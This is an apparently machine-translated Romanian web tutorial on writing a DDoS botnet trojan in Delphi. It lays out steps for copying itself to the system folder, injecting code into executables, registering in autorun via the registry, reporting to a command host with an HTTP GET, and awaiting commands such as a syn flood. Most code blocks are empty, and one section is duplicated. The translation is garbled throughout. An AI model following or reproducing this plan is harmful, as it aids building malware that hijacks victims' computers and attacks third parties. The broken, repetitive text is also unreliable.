Barca pe delphi

Bot pe Delphi

Din anumite motive, mulți programatori novici cred că virușii de calculator sunt scrise în asamblare și în rare excepții în C ++. Vă asigur că malware-ul poate fi scris în orice limbaj de programare!






Și așa. Astăzi va fi despre delphi - limba cea mai convenabilă în opinia mea, pentru că el are cea mai convenabilă sintaxă pentru înțelegerea oamenilor, desigur, răspândirea la el este dată și de faptul că el este predat la școală. Litigiile dintre codoarele Delphi și codoarele C ++ pot fi observate aproape pe orice loc. Ca regulă, argumentele pentru C ++ sunt greutatea și încărcarea procesorului, argumentele lui Delphi nu sunt utilitatea codului. De regulă, aceste litigii se încheie odată cu sosirea administratorului și strigătele. Astăzi voi încerca să explic cât mai clar posibil modul de scriere a unei rețele bot, să analizăm scrierea botnet-ului DDoS pe Delphi.


Ce ar trebui să facem mai întâi? - Crearea unui algoritm troian:
1. Ascundeți în sistem
2. Deghizați-vă ca proces de sistem
3. Înscrieți-vă în autorun
4. Apăsați pe gazdă
5. Așteptați comanda de la "master"
Aici, primul pas pe care l-am trecut deja - algoritmul unei retele simple bot este gata!


Să rezolvăm totul la rândul său.
1. Ce înseamnă „să se ascundă în sistem?“, Locuiți în memorie în cazul în care antivirusniki și nasul nu împinge, puteți crea un sector de boot și lansează primele sisteme de operare, dar este dificil să nu Delphi, ci mai degrabă pentru ASM, cu atât mai mult aveți nevoie de un troian de comportament de rootkit, nu de un bootkit. Noi, așa cum am spus, scrieți cele mai simple trei și va fi copiat numai în dosarul de sistem.






cod:

De asemenea, este posibil să aveți nevoie de:
cale către fișier:
cod:

această funcție returnează calea din sistem în programul nostru.
cod:

Aceasta ne întoarce un nume în programul nostru.
cod:

Această funcție nu este pur și simplu înlocuitoare! Aceasta returnează discul din care rulează programul, foarte util pentru "de pe o unitate flash USB".
Și așa. aici am decis totul. Trecem la cap-nevedimke.


2. Mascarea în cadrul procesului de sistem - înseamnă că programul nostru va fi doar un comportament de rootkit. Adesea, procesele de depășire sunt de mare și explorator, iar altele par să nu fie. Vom face un pic în ebraică și vom lua legătura cu un alt proces. Exemple de injecții:
Exemplu 1
Un exemplu de adăugare a codului (funcții Beep) la fișierele exe,
fără a mări dimensiunea acestora.


1. Găsiți secțiunea cu codul.
2. Verificați (liber la sfârșitul secțiunii 86 octeți).
3. Dacă adăugăm liber codul.
4. Schimbați punctul de intrare în codul nostru.
cod:

Fii atent! Din moment ce acesta este doar un manual - dau codul pentru o actualizare, și nu pentru acțiuni ilegale.


3. Continuați, acum trebuie să vă înregistrați în autorun, putem face acest lucru în moduri diferite, am ales să îl adaug prin registru, pentru o mai mare vizibilitate:
cod:

unde Application.Exename este comanda care returneaza numele programului nostru.


4. bătu pe gazdă nu este la fel de dificil ca s-ar părea, pentru un motiv sau altul, mulți oameni cred că otstuk - este o confuzie cu codul, cu variante de ocolire și alte lucruri - am fiara, că aceasta poate fi o solicitare GET simplu
cod:

5. În cele din urmă, așteaptă echipa de la proprietar. Aici mă bazez pe imaginația ta, deoarece comanda va fi executată în numele administratorului (deoarece rootkit-ul lucrează cu procesul de administrare?).
Aici pot arunca codul pentru atacul syn-inundații:
cod:

4. bătu pe gazdă nu este la fel de dificil ca s-ar părea, pentru un motiv sau altul, mulți oameni cred că otstuk - este o confuzie cu codul, cu variante de ocolire și alte lucruri - am fiara, că aceasta poate fi o solicitare GET simplu
cod:
trt: șir;
trt: = 'hi_admin'
trt: = StringReplace (trt, '', '+',
[rfReplaceAll, rfIgnoreCase]);
Otk: = Form2.IdHttp1.Get (Numele nostru_host ... .a.ru \ bla-bla-bla + 'trt');

5. În cele din urmă, așteaptă echipa de la proprietar.

Nu puteți face asta. Orice Aver va arde pe aici. + domeniul va intra rapid în negru. Și da, de fapt, atingerea este una dintre acțiunile importante.







Articole similare

Trimiteți-le prietenilor: